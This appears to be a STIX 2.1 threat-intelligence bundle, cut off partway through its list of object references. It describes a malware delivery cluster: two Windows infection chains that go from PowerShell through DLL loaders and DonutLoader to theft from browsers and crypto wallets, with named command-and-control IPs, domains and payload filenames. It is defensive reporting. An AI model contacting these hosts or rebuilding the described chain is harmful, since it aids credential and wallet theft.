{
  "type": "bundle",
  "id": "bundle--3714b63e-6a18-4e11-aa29-518e4973c319",
  "spec_version": "2.1",
  "objects": [
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5f04b92e-0068-4280-b2d1-ca8e2d23bafd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "SL-ADV-007 UNIFIED v2: AS202412 TDS Cluster \u2014 Complete Intelligence Package with Callchain SCOs (March\u2013May 2026)",
      "description": "SecureLeaf unified threat intelligence report \u2014 final version. Consolidates: V4/V3/V1/V2 loader analyses, OTX pulse enrichment, original SL-ADV-007 Windows callchain (V1), Bryan affiliate campaign callchain, STIX 2.1 process/file/network-traffic SCOs for both execution chains.\n\nCLUSTER ACTIVE: March 20 \u2013 May 19, 2026 (60+ days confirmed).\n\nTWO DISTINCT WINDOWS CHAINS DOCUMENTED:\nOriginal (V1): PS\u2192178.16.52.232\u2192158.94.208.92\u2192tr0oowwq.dll\u2192svchost\u2192DonutLoader\u2192chrome/FF/wallets. Parallel: WScript\u2192payload.js\u2192Protected.py (PyCryptodome, NT syscalls, wab.exe injection).\nBryan affiliate: PS\u219291.92.240.117\u219291.92.240.121\u2192dwqlmpkj.dll\u2192svchost\u2192student_s.bin+student_l.bin\u2192chrome/FF(places.sqlite).\n\nAFFILIATE PLATFORM EVIDENCE: Dedicated C2 IPs per campaign, 'student' vs 'my' payload segmentation on shared DonutLoader C2, per-affiliate DLL name randomization, sdntds.shop domain expansion, captioto.com/cptoptious.com/newtdsone.shop TDS pool.\n\nFULL IOC COUNT: 10 malware, 21+ infrastructure, 120+ indicators, 62 TTPs, 5 campaigns, 20 process SCOs, 9 file SCOs, 3 network-traffic SCOs, 9 observed-data objects.",
      "published": "2026-05-19T00:00:00.000Z",
      "report_types": [
        "threat-actor",
        "malware",
        "campaign",
        "indicators",
        "attack-pattern"
      ],
      "object_refs": [
        "relationship--e8cb02ab-5f85-436d-a1d1-1d656e52be41",
        "relationship--d4643f00-874b-4620-99a6-822f673397fd",
        "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
        "indicator--d9281b63-9ba7-4b95-b5df-ffa71b7a1e1a",
        "indicator--5ab6588d-7397-4440-a963-5a58c833484b",
        "attack-pattern--20faa53e-ad48-4eb3-86da-f3bffcdc490b",
        "indicator--f701673e-8308-4c25-92e6-ec556ab22767",
        "relationship--24334b8a-debc-4329-bf05-e730be79396f",
        "relationship--ea5e4ae7-e352-40fc-903a-46f7b3d7658e",
        "indicator--7f56fc75-17b4-463c-8d51-6cea59fb9c67",
        "relationship--d0326b3c-13f8-4257-8dce-a57597cf8c00",
        "relationship--28bd48c7-03c7-44cb-b228-bed295b79d30",
        "indicator--a28f857a-19f2-4e91-9c1b-d46ec22c2c29",
        "indicator--9f485729-6d5b-4065-9ca8-33e648acdccf",
        "attack-pattern--abc48e17-1429-421a-943d-bc93b63c8a15",
        "indicator--06ebe711-e144-41c8-b6ed-976a9b5049fc",
        "attack-pattern--19f54e44-5a76-4319-a03f-600ed5c58fdd",
        "indicator--e0d5f982-3635-4811-a7c1-6f46455efe27",
        "relationship--f8fa9be6-adcf-42e9-bf1a-762c525ea62c",
        "relationship--f0b2c80d-a6ff-46ba-b10e-a0e890a24582",
        "relationship--93ad75f8-bd6c-41e5-a1f9-7a1c3d61269c",
        "process--23f1d410-05b7-43f1-985b-6700240707c1",
        "indicator--3e8a2307-6039-46d8-8968-7b6f52d4b1af",
        "indicator--a9fb2885-2ced-43f6-bffc-3e25dd70fec8",
        "attack-pattern--f313fb9c-74e6-49bb-80d9-02606d618988",
        "indicator--b504534a-e6f1-42ba-baea-1d23eb8a8eb8",
        "attack-pattern--7d0c88a1-18bf-42a2-bf5e-7aade64b9d3a",
        "relationship--0e71275a-95e5-4989-ab53-1d90afe9cccd",
        "relationship--9be5d4fc-9574-4737-a195-628e736bc870",
        "relationship--78ba5691-d7fd-47ec-8a7f-cbac5b5234c6",
        "relationship--d50b4956-a533-4fd5-a69b-558d65c18605",
        "attack-pattern--e3492bdf-28a4-4651-861c-84b205b1c740",
        "relationship--97fe1a23-99dd-4d05-bfff-f8d5238c06a7",
        "indicator--9607e332-908e-458d-8b6a-700e46ecbcb6",
        "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
        "indicator--f2efd379-27b0-493f-a58e-3587e75ee694",
        "indicator--185dea0e-c306-46a5-ab00-efb8b36106b7",
        "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
        "relationship--816115cb-72c5-4117-9db0-271238274995",
        "attack-pattern--753a2633-e834-4ba8-a846-96dfd1bb7ed6",
        "relationship--ce313ffe-8117-47c9-a448-5044c480ab17",
        "indicator--4371eacf-7fc2-41ca-9b13-293eae43f5b1",
        "indicator--c21db930-ca9b-415f-b15e-7ca72f0f4c83",
        "relationship--b5e27903-d8e4-4684-a4f6-3e47d42e75b2",
        "relationship--5d24d8e9-5e69-415c-bd45-73217d1f01d6",
        "process--6a0b801c-9236-4b48-991f-6ff40fbe8827",
        "relationship--b9b9c6f4-40ce-49b0-8a30-44bede321c6e",
        "attack-pattern--008b5d30-4100-44e2-9557-79307c836574",
        "attack-pattern--69a5272e-3422-400a-b74b-d74877c3b104",
        "indicator--fa029497-c922-41ae-9d8e-601a364cb1a6",
        "relationship--4c55e08f-9454-482f-8d16-bed6004d6955",
        "indicator--13f0aada-9f92-48db-a400-084ec547cb57",
        "relationship--9b33a459-21cd-4225-a839-d61e65e12cc9",
        "indicator--b2b16a5d-3e31-40d7-9c47-c9f3da26e824",
        "indicator--fce050a1-6f2e-4d5a-9168-a77515118121",
        "attack-pattern--b779f195-2015-4fc3-8419-68353cb9518c",
        "relationship--554e16fc-da24-4733-9246-74bb4df092e6",
        "indicator--adb73ef6-b188-4241-bd90-d2cb489a439b",
        "indicator--4c4a571f-ea83-4dd4-9dc7-32b54aad4077",
        "indicator--7b666298-3fd5-4a19-bb97-e186932067c2",
        "infrastructure--403e208a-e490-4d2a-aa67-5816a6ab0b73",
        "relationship--cc3a0f2b-62b1-4bfd-8a9c-1a3c2439683e",
        "relationship--17e64584-6857-4c69-984a-8fdb7aef35a1",
        "relationship--437f40ff-29c1-4027-bed3-6e3c7cee05c5",
        "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9",
        "indicator--161124c4-d98f-42d0-87db-b16857807b07",
        "process--4bea18b3-b9a3-4879-a036-41db052de2f4",
        "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b",
        "network-traffic--ca16c5f4-e143-4e8c-a372-f459bc36ebda",
        "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4",
        "indicator--6095338f-01c5-4869-9d7f-628d3b00c1c3",
        "file--8411a84c-7d3b-4d69-9ab9-dfec21df8348",
        "attack-pattern--b7c4341a-1acb-4a18-a15a-2708ed6c9cc6",
        "observed-data--d255af9b-affa-4662-9628-876708c3b978",
        "attack-pattern--4dab7fa0-6671-4954-bbf8-78df78f4f939",
        "attack-pattern--0d0461cf-e98a-4e7b-8aac-5aba97b7b803",
        "relationship--f9396cd2-72c5-4eb5-b2df-7ee13f871f7d",
        "attack-pattern--905c00c3-d29c-45ae-a260-c7fad3edeea8",
        "campaign--6602b80a-c500-4017-9815-36848af024e0",
        "relationship--41c4adf9-aff1-489e-90a5-2f517c316950",
        "attack-pattern--06a150f4-ffa1-47e4-beb4-7cc91f50c537",
        "attack-pattern--21da9b60-9393-47fa-9163-d82e14bf4439",
        "relationship--53188bee-af86-4335-a42e-d61d149e1d17",
        "attack-pattern--8e3f00c4-508d-403b-a1e6-ef8dbfa69ddf",
        "indicator--0c18e504-9a50-4da5-8acc-e954c9224b94",
        "relationship--bc65ad02-7917-4a43-90ae-9c11a4d60759",
        "relationship--ceee800e-9b48-4bb3-87f0-60eacc825df9",
        "attack-pattern--10ec9dcd-f7f1-4e00-aea2-f48b8236eaf4",
        "relationship--3a768c5d-61d5-4174-a61e-09b99227ec92",
        "indicator--351160e9-d1b4-4889-9a4c-6ef23c6c5f16",
        "relationship--ebe8848e-4cb8-4bd1-ba09-9c8fc0e2b44d",
        "indicator--145f5897-db17-444a-8ac4-596a85010f8a",
        "relationship--5773b364-450a-4575-a63d-00a014c1908a",
        "file--a87058b1-11de-4028-92c6-1b6f7517cd24",
        "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e",
        "relationship--867798bf-6361-463e-95c5-ec5eaf6c9ea0",
        "relationship--b32b8faf-0ec8-4899-9dc6-1380edaa9e28",
        "indicator--952a3aef-a9f6-42fe-88ae-e4d3108ae35f",
        "relationship--fd1ffec0-771c-46ed-9ab6-7cecfd91b620",
        "process--590a76b0-7501-4381-aa13-d17cdc284f78",
        "note--f8d4b7b5-6316-4b5b-8b52-0e887b1ff176",
        "indicator--f9918948-fad5-4b36-8466-d1a7002c5a63",
        "attack-pattern--918c612f-57dd-4882-ae11-7c96eaf3a6fd",
        "relationship--26e03347-5737-48b2-b224-121253f64b27",
        "relationship--245b9046-96a0-434c-a2ea-36824a18d3a6",
        "relationship--653b6fea-cfbf-4c97-966f-1d8c2b2eb920",
        "relationship--c692e8c1-8558-489a-9e9d-00b41c6dc647",
        "relationship--8ae42d1e-a1f1-4bd5-934f-2a49578eaea7",
        "process--5e0af509-82c1-44bd-9281-3dd3e034a870",
        "file--39edc8f7-94a9-4072-aeb7-ee6500fe63fb",
        "relationship--ebfdf5a8-61f3-4564-a51c-25b0c9cca75c",
        "relationship--892f7e88-960a-4f67-96ec-99e4cc3e3d5c",
        "indicator--8b5c28ad-7556-4990-a294-dbd4e583979b",
        "indicator--bba01ec8-09b4-4b45-9839-49aa9e2794d0",
        "observed-data--c327e1b9-886b-441e-94d4-65e271054712",
        "process--3dbfa4a7-5ecf-417d-87da-296c9372c50a",
        "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
        "attack-pattern--e8bd5fe3-e15f-4b32-9620-058938616094",
        "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
        "attack-pattern--0d4a453d-722c-43a7-bed1-3521d275cc28",
        "indicator--efe5baa8-f3a7-420b-8d5a-b1182040edc6",
        "indicator--b333dc18-af92-4961-b9c5-b71b100ad399",
        "relationship--77f48057-d0f9-498e-8c5e-fa8834190b7e",
        "relationship--0ced4d36-bfe3-499f-9ee2-6d69de076684",
        "attack-pattern--c08a9c70-8acd-4f92-9df6-7ff94c92f78c",
        "relationship--a035ec10-2d37-40e2-a8e3-69a3cee9e479",
        "indicator--74e69086-8147-449d-a832-5f3f0d0c6131",
        "attack-pattern--114e81d2-b996-4d5f-a9b1-d55e78b79aa8",
        "relationship--1ac09a93-904a-4b03-8717-40f109b89805",
        "indicator--555fac76-56df-477f-a55c-655e1848a22e",
        "relationship--38ff43a4-555d-46d5-837b-71e4c3c11436",
        "attack-pattern--b9f4edaa-4e36-491a-a2da-9e915da92c16",
        "relationship--5f81764c-8f2f-4b7f-8341-f896f95382ee",
        "attack-pattern--6474ec87-07d3-4b3b-ae22-79939ff853c0",
        "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
        "relationship--4efcf276-b503-4865-9597-84ebd0bb6424",
        "indicator--8666c93b-ff7f-4b48-8ba1-eddc05fc7c4c",
        "relationship--202d585e-a4a4-4be3-b498-775fd19b6e09",
        "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
        "relationship--40b71ccd-9056-4389-b4c3-cefce02cd34d",
        "indicator--eecca675-f1c7-4c72-b8c9-bf481b1e767c",
        "attack-pattern--821c74bc-675b-45a3-a335-865f1199c00d",
        "relationship--36f566ee-2287-4b3e-abea-55b809be3577",
        "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f",
        "campaign--165c2be8-c4d6-4389-9a30-88d5d589f88f",
        "note--4cf535ed-0ad3-40b1-bb08-427c0d4312d7",
        "attack-pattern--7f8e5085-ed68-42b9-9056-b395331f9096",
        "indicator--a4c64c4e-f824-49c4-920c-29a642e7456b",
        "relationship--b67b9518-1875-41f3-abed-86178e7bb945",
        "relationship--ca8c4c4f-f2e6-474f-85f2-314f552b7c12",
        "attack-pattern--1ed9c8ee-4be8-4196-ba0e-65b49da81a14",
        "indicator--9ac38a2c-47a8-45f3-b787-7fa8bd44a6c7",
        "attack-pattern--7612c7bf-3153-4a0c-b6c7-b030634e93cb",
        "indicator--47cce175-2625-4713-aa42-5b7bfa35ed01",
        "relationship--38c3f176-b3b8-4cf9-8d60-b159a4cddb1f",
        "relationship--b0cbd74d-6c62-42cd-9d0a-3e0e8db28b07",
        "indicator--c47d5e9a-06a2-40e0-9dcc-909314c75cdb",
        "relationship--19696ea1-4f68-4945-96bc-3d00af3d077d",
        "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac",
        "relationship--9bf8db0a-4905-41a2-bff8-707dd02745a6",
        "relationship--e7be473c-842b-4ba1-b78a-572c9b5fa2ef",
        "relationship--d4b9dd9c-2fd6-40a0-8bf9-95b4a47d6f19",
        "relationship--48554838-3e7f-40eb-98ab-4a90b13f8d8f",
        "relationship--a0f9dc47-dbfe-420e-b6dd-4fdbd755a207",
        "attack-pattern--01b04983-fe4e-491f-9481-f738ad87890b",
        "relationship--8dce1b40-6676-48cc-99f8-4959ff9594f1",
        "relationship--9a33a4b4-3ee0-4998-92da-876643569906",
        "indicator--f9fef7c7-6cb1-41ae-9421-b0e11a12b9e0",
        "relationship--cc7726f3-2384-490f-8904-1f9d1a4c3473",
        "relationship--f7126e08-5e91-4bf6-bdd6-8a23efc48218",
        "relationship--c36f7ea3-ff2d-4cf2-82e5-b2daa06d201d",
        "relationship--155766b1-6ec0-4070-9bd3-0bc495ca7f3e",
        "indicator--58d34e92-e413-49b9-8eff-08a46e19d29a",
        "note--63c4cfc2-e5eb-4948-bece-eb46e4df89e7",
        "campaign--1f3b8c05-7a58-45b1-b228-6fc7c5ab9c33",
        "relationship--0a7163c0-c74e-4235-8b57-19fbd4caea92",
        "indicator--31d4b9ba-b028-4cce-881e-b0e7de7985e2",
        "identity--a06f63fe-1ba3-4a52-87ac-5c98f7ea3513",
        "indicator--d2c06d08-5ab3-4100-b7e0-4eeeaea9258b",
        "indicator--892e567a-7e3c-4c79-82fb-d43479c9defa",
        "indicator--cd1d795d-6461-42a4-9802-4c5607715627",
        "indicator--0a16e5d4-3962-4d3e-b7ce-d6a5deade0c5",
        "relationship--a6338304-56cc-4490-8ab7-0752024c900c",
        "relationship--fd07bfab-cd90-495c-bed6-785aa1bb9662",
        "relationship--6b680118-1fd4-42e8-a5c7-2f1fc9f260e9",
        "relationship--1b9f1b1b-b54c-426f-9465-079eb4287437",
        "relationship--fab38401-db8e-4e1f-bd8d-06aa023cf2bc",
        "attack-pattern--922f869e-8c22-42fb-ab24-ac3bef8d1d0c",
        "indicator--397eef52-ba80-4efc-bf14-d60b925d83ea",
        "relationship--14510bef-6ad1-4402-9760-ac802a403b96",
        "indicator--be5d21db-c597-4746-bf93-f0f207cb2fb1",
        "relationship--ee9cbf29-370a-42a0-acad-2016f58791f5",
        "file--f050a904-eb91-4728-83f8-cf90e2fd5bef",
        "attack-pattern--e7c64603-910c-46ca-aa07-e85cb6ba2432",
        "indicator--e9919288-46a7-4694-8487-cef5abc5be38",
        "relationship--3382650e-6541-4a12-84a7-51eec676dd93",
        "attack-pattern--930617e7-b93b-40b3-9f41-5b91a1756916",
        "relationship--ade2feb2-489c-4a9f-8d9f-a1d3a7e2ad0f",
        "infrastructure--4746914e-fdfb-4255-9157-0ce196797500",
        "infrastructure--4928286b-2992-45fe-b9af-2ef98d9e820f",
        "indicator--69bfbeee-1862-487b-b087-b43d894b46ad",
        "relationship--642b4f61-d89f-4198-ae67-05ff9b91d4da",
        "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8",
        "indicator--c82abcfd-8000-45b3-80f0-04ae65ed2843",
        "indicator--3e470f18-8cd4-4a14-b260-0dea11907c21",
        "relationship--0a302975-2cbe-4422-af79-7f743f14e35d",
        "indicator--36bb8cf5-67ab-48c0-8f8e-de3e1351072a",
        "relationship--64ad6ba9-c72b-4e9a-9f86-5e43150a465c",
        "process--742ba999-1e41-4f52-b169-c5ad60196d94",
        "process--1eb06df6-4b5f-41b2-8a7e-cb36626b0d99",
        "observed-data--db49abef-8b91-42de-843f-bc622cc241c1",
        "relationship--b746bc5b-309b-462d-91dc-e55aba21d16a",
        "indicator--7a6e762c-ff00-49fb-a0a1-96bed10f5aeb",
        "indicator--5acb27f9-c34f-459f-826e-01a781650cc6",
        "relationship--0646549b-309b-4a41-bb3b-317d41e36f64",
        "relationship--588cf250-d886-4541-994b-506cba9c63cd",
        "indicator--bc0c82d6-78d4-46b4-b4f5-5211dc4a162e",
        "indicator--ef4afaf6-6c4a-42f5-9fc4-384928a06ec1",
        "attack-pattern--365dbf0a-4202-4c24-9205-4e8455a93a55",
        "relationship--d409bd31-0b75-4611-994c-fe22e142066e",
        "infrastructure--26a4ff55-cd69-4a45-a1e8-0ac4362588f3",
        "attack-pattern--5552b4e5-d69a-4def-b51d-15f7e14deaef",
        "relationship--66193590-b311-4bc1-a583-9300a7eb7525",
        "attack-pattern--24a98d95-0ecc-42a1-adae-3124fc5af164",
        "relationship--82caa550-ae21-40f7-a5f3-7bba97ac11ad",
        "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61",
        "relationship--012916d0-5240-4f5a-88fd-a31ca1f2ee65",
        "process--e7dee33f-2980-490d-8621-e1802e0e2586",
        "relationship--f681253f-a810-47a4-9344-6aa11c1ee319",
        "attack-pattern--bf614ebf-b976-44e2-ab21-869b2d5108cc",
        "relationship--0fb79a5f-8253-4a2b-a783-bc7ed23ef80c",
        "indicator--cfec54f3-b357-41c4-97a1-2d1778ba687f",
        "relationship--7b40079d-f32b-40d6-a73b-b742f5d55449",
        "attack-pattern--224b0c8d-55dc-4fc3-b518-1dde14ee8a1e",
        "indicator--9f4acaf5-9693-4c51-8119-d47baf0b6c32",
        "indicator--187c8ef4-e9bf-4100-822e-894f0193b30f",
        "relationship--e371705a-0204-4e8f-bf02-6da65a4b266c",
        "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c",
        "attack-pattern--57b7b160-ed4d-4490-bb90-78991009371f",
        "relationship--b4c08bc4-c7cf-4732-8450-1baaf00ea3cb",
        "relationship--7c7a8a18-1adf-4833-88f1-c569a8c56a17",
        "indicator--227c1dc1-f220-4f04-bd9f-56c08678962e",
        "indicator--9d0cdcaf-5c80-48fe-bb5e-761dc1acea81",
        "indicator--7e851f21-8ce9-410e-9ade-5484401f9bb7",
        "indicator--aaeebea5-c6a2-4405-b16f-4f47aa944d10",
        "indicator--cdbf6a27-5d50-455a-a649-9cb700898b67",
        "indicator--27191f7f-d686-4a58-937d-0ab4f6b2d868",
        "file--5deb91ed-e003-451b-9a79-df8eb36bbd65",
        "relationship--2255b461-22fd-4fa0-aacc-60bede0dbec6",
        "relationship--7e722dd5-b88e-432c-b7ab-d7037dc3f55f",
        "relationship--82b5a910-a44f-49c2-ad87-19a60381b537",
        "relationship--0c1ff019-dec2-4fa7-b8bc-d53978542fcc",
        "process--941cb6b8-04d8-476f-af10-e77c57f01ca7",
        "indicator--5f173597-57d6-4ab1-a404-104d506832a2",
        "process--ca931dad-6efe-4553-b058-0e7d47f62033",
        "relationship--278660f1-456e-45cd-a180-967835e164ca",
        "indicator--64cc5109-3562-45d1-9ae6-269039741ad5",
        "indicator--e4dbccb9-8458-43c1-a1ce-58678d9007f8",
        "indicator--e58f52bc-35aa-41d3-bad0-790c83d9dfed",
        "relationship--38a4977c-481b-4e31-b51b-fdbfdaf72224",
        "relationship--3b063fa5-ba16-42fb-a330-dc4744332b1d",
        "process--871eceb3-7924-47a2-8a21-ea6150efb5a2",
        "infrastructure--3ab7c58f-ae41-4889-a55d-aeda799089fd",
        "relationship--2d04a952-0f9a-4581-abd6-763d9e633fa2",
        "attack-pattern--09d6b4b8-1ab2-4514-bf39-c2c69277b243",
        "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
        "process--5cfccef0-7fc4-4f70-b616-268c774f0b73",
        "indicator--9e6c793a-8388-4297-8ed2-4474c868f335",
        "relationship--9f4f6d45-0ae6-49e0-811d-7ea977e3861c",
        "indicator--2d7d0ff9-d9a8-4940-9e85-8d36f7028b62",
        "relationship--e77bd2ba-5eff-4309-84af-631f3c23f98d",
        "attack-pattern--4221a565-d330-4a37-b682-bd8afea876b6",
        "relationship--ebb9115c-5abd-47d3-a3c2-94509f242bff",
        "attack-pattern--3c2812fc-e9a1-4ae8-bf5a-9e1c5398cdb9",
        "relationship--fe8592fd-a702-4ad8-a87a-756b6fceadb2",
        "relationship--3ed4414b-2116-4a90-b9e7-675e2746fd39",
        "indicator--b42da53d-df9d-4ca5-a0de-09b91c8cbd2e",
        "relationship--44d388ac-d2dd-485d-916f-cfb26fe59586",
        "attack-pattern--2115dee5-998e-44fd-a87f-af914112a548",
        "indicator--0e369376-c933-401f-bda3-2d52c6bc17a9",
        "indicator--7b927664-e4fc-40ac-8a2d-b00e09244e2f",
        "observed-data--69ee0923-f4ca-4b22-8663-6e53c9b15216",
        "file--7d255c91-1fff-4502-ab8e-fb1c90ad414b",
        "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
        "indicator--b25b0d59-610b-4479-8152-ad8d430393e6",
        "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
        "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11",
        "attack-pattern--008a4ad5-b0f1-4180-a7e3-9d3a58c0c143",
        "relationship--bd29716c-e762-4928-9307-0209edc5b473",
        "relationship--26ef64c3-6106-415c-8820-3c80bac3d45c",
        "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131",
        "relationship--f46cc453-0525-47ad-86f8-eff7d9a9837c",
        "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b",
        "relationship--51328120-484d-4f21-b5f5-13723703e49c",
        "relationship--978d37b1-1c32-4be8-89f0-a875185760f0",
        "indicator--41f15b3b-22f9-4c4f-bef1-68b1c60acc3d",
        "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
        "relationship--ccfa633e-33e4-4fb7-b749-2d5fc9afc050",
        "relationship--79fe2860-8c59-4525-a62f-6f27fe90f0f5",
        "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db",
        "infrastructure--937bb209-fd7c-481a-9c76-736cf14c8813",
        "relationship--30a6d4d6-59c9-4d77-a77c-d99511eb4499",
        "indicator--df8a5160-95f2-40ee-968a-fb77d3f4e262",
        "attack-pattern--0b92f6a8-147e-4a48-ad1f-629aa22a00fa",
        "relationship--44f0826a-c315-4e53-bcf6-054ee53736d2",
        "relationship--e3900968-7ce1-4a61-9d56-2a367061d373",
        "relationship--14a84e74-560c-4703-962e-c072ae2213f7",
        "relationship--9bcb8b92-41a3-4049-8e1b-e469cb2e9086",
        "indicator--6aa035e5-44c0-490f-8bdc-82446b99d9a3",
        "indicator--2b5b531b-1724-4a0c-964d-0bc5d9e1c1a8",
        "attack-pattern--79fb3213-1f11-43e1-956c-b8d8e253d0ec",
        "relationship--8b93c29e-f1a3-47ac-87d5-d8bc23271c14",
        "relationship--f52a311d-0f93-4ef5-9060-bc4a9906b107",
        "attack-pattern--99f2ace8-7793-4317-b1db-7b16dc824413",
        "indicator--76dbc9f2-f941-487a-813c-dda23d440357",
        "observed-data--fd5bf982-8ece-476e-b129-077419443782",
        "indicator--c74a3775-b069-4570-8a17-270bb4519c77",
        "relationship--4134e9a1-216a-4c55-bd19-d105b3b5736c",
        "indicator--a45b82dc-7b83-44dc-8d10-01a58210997e",
        "relationship--5e404a92-489a-41e1-9016-ce864d34990b",
        "relationship--6a85f10c-5a97-44b2-a2d7-86333f73bba4",
        "indicator--e4d987d5-8aea-4b61-b23b-0a791ec872fb",
        "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
        "relationship--51165798-7155-4be0-8a53-3f5363ec276c",
        "attack-pattern--30f20f37-3252-4ba7-a7ec-5801184cc078",
        "attack-pattern--83552909-7093-498f-bd03-51fa30e434db",
        "attack-pattern--d052c8f6-7ff8-4887-beda-6034b4981333",
        "indicator--60cab142-70ce-4322-aa89-3c59864ad221",
        "relationship--17c9a593-2fee-42d9-9081-9d81f9e7035d",
        "attack-pattern--4ad400f6-3d74-41af-be79-d45383f0e37d",
        "observed-data--1d95e8a8-fc3f-47a5-ba88-078910037938",
        "indicator--8cd9f389-f944-48ce-ad1b-91503a5cd209",
        "attack-pattern--5dc2a226-e68f-4783-b8cd-38247d4fef7d",
        "relationship--6bc3b3a1-1d52-44e1-afe4-4afbc4a41b91",
        "observed-data--1e400f18-0cd6-4cf0-a76f-05f936a642c3",
        "indicator--2cb8094e-101a-4167-9105-e2c1cac4d872",
        "relationship--b2484a1f-cc8f-4e48-bb32-7bb221e84132",
        "relationship--610fa698-f978-4f0c-a327-adc1ca4b14a5",
        "relationship--79c8f6d4-21f9-41d1-96a5-e4f739861d1a",
        "relationship--80e88d9a-0b96-47d4-9982-cf469ecb95c0",
        "attack-pattern--5fdadf5e-da2b-4f42-9621-876da67b4672",
        "attack-pattern--6a49e18b-18d1-4720-ba93-eced5079b060",
        "relationship--4409703a-0021-42f5-8eea-712dd8c031bc",
        "infrastructure--3200e47c-60be-457a-a251-a2dcd0732fb4",
        "attack-pattern--9c21e0c6-4300-4fa0-85cf-617f887f4608",
        "relationship--ee56737f-461e-47ae-9466-371bd0e67b19",
        "infrastructure--a8742037-1ec8-433c-a173-1666c3e92b71",
        "indicator--c65f9f8a-354e-47bf-8843-465baa2ee09f",
        "relationship--40c3004e-6ed1-42d1-9a74-2925771ce65a",
        "relationship--7d460bb9-8b8c-4a42-a8af-f6bbeee8aba2",
        "indicator--91538353-23f6-42ba-9b8e-a77b8c7ef1d6",
        "file--31d516ff-33a0-4474-b293-2ab9503130cc",
        "relationship--abb7fb0a-1315-4d41-9da0-7ba35564e71a",
        "relationship--cad100a8-09f3-4ce6-b8b0-d1c083dc160f",
        "indicator--6a90598d-2eda-4a45-9928-de4a0127b7c4",
        "indicator--eb580302-abc8-46e9-bfe5-b2d4b7d43fe5",
        "relationship--cac3e9ea-32c6-44a4-8f43-4ec1b58e5cee",
        "indicator--6335212e-8524-4651-a211-68f17c971c20",
        "relationship--6cb58393-972e-4c23-a3ab-a54d31cf99d1",
        "indicator--468dcbb9-3acd-4480-8ddb-74c073a33065",
        "indicator--6b16164a-46e8-4d1e-971c-47554082e28a",
        "indicator--baa6c03b-2691-4b4e-a50d-58043e899dc2",
        "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944",
        "note--b05cc05f-8819-4220-9a0d-be63d5a66841",
        "relationship--7882815b-6732-4369-8c29-f84eaf16aa54",
        "file--617572d2-0242-4370-8302-10d0cb8c4e19",
        "indicator--acdfce08-d674-4e7f-b3ba-7d2c702e66da",
        "relationship--35d145b3-e508-46a8-b977-1ddc08409574",
        "indicator--4ad3bb0b-98e6-4b68-8940-60b50e15d410",
        "relationship--fb1fc6a3-b5e6-494c-aff8-f65e232b3820",
        "campaign--8ff91c87-e1b7-49fe-823f-c9b6108cd46f",
        "relationship--88acba85-0cb8-497b-8935-13ee40866249",
        "relationship--93ea5142-2f6f-42f7-9307-26b1b2bc9d46",
        "relationship--88d0a149-46f8-4b10-8186-378cac4bc920",
        "indicator--e5718f75-bc2b-4cb9-a5c6-3f0b98e54142",
        "indicator--79c3034f-50e5-4ad7-884d-80dfafe59bdf",
        "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
        "attack-pattern--b6716550-aae5-42da-b926-70b90e26b397",
        "relationship--32931cc9-182e-4573-a775-a12a0f6f0a7f",
        "relationship--c4525ff5-aa67-4c50-9a1d-b2899c06f0c4",
        "process--7ce8c822-5f65-44f0-a207-9aad138f1420",
        "indicator--66de35a6-54d0-4ce4-a783-cd304e6c1071",
        "process--9da22fa6-69c4-47a2-a294-83358ef5f9d2",
        "indicator--48805e62-ccb9-4904-accf-24ff35396e71",
        "indicator--4f2242e3-e91c-4126-89cc-7dafd3d61804",
        "relationship--c4628b05-8725-4007-b503-c78cce6a6d5f",
        "indicator--17945ceb-5351-4271-b5fb-0dc1262db963",
        "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
        "indicator--e6e0adc8-5b21-43a2-aa06-44350e3f386f",
        "file--61e3fe1d-c51f-4a53-a10e-ac0c3685aae5",
        "relationship--8c6f4115-4781-43c8-b54a-12602feefe2b",
        "indicator--2fa2a651-65cd-42b6-82e2-8fe0560b876f",
        "indicator--8cfcf337-0d4c-4f96-ba49-67a7255c1294",
        "relationship--683c953a-3ca1-4e9a-a955-0018e3da6fb5",
        "attack-pattern--73d46035-d53f-43ac-a23e-1587e08a7c43",
        "indicator--7217d17c-3685-4973-a493-b5d4f3f921e9",
        "attack-pattern--f3f3c056-4cf8-469e-8ea2-3529b7c656ad",
        "indicator--d37a9828-337b-483d-a7c8-6a45c715c4b8",
        "campaign--6602261d-b993-479b-9fc1-d15e082d751a",
        "observed-data--0a7c3c5d-7138-48c4-ab9f-66964b20ab5a",
        "indicator--9f5f01e7-52a5-4698-aeb0-b0e00800b723",
        "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
        "observed-data--e6872478-9b30-4081-bb40-f67f3637cf87",
        "relationship--85370973-876c-417c-9060-006b4874ff3a",
        "indicator--2fe93e55-62c3-4841-933d-aca97e666c71",
        "network-traffic--5e0c013a-a09f-4f65-9868-69fcf0481b34",
        "indicator--56babd21-17c0-40c7-aa35-16a8d0c21746",
        "attack-pattern--bd64e0b1-836d-4d1d-a305-c98f470840ea",
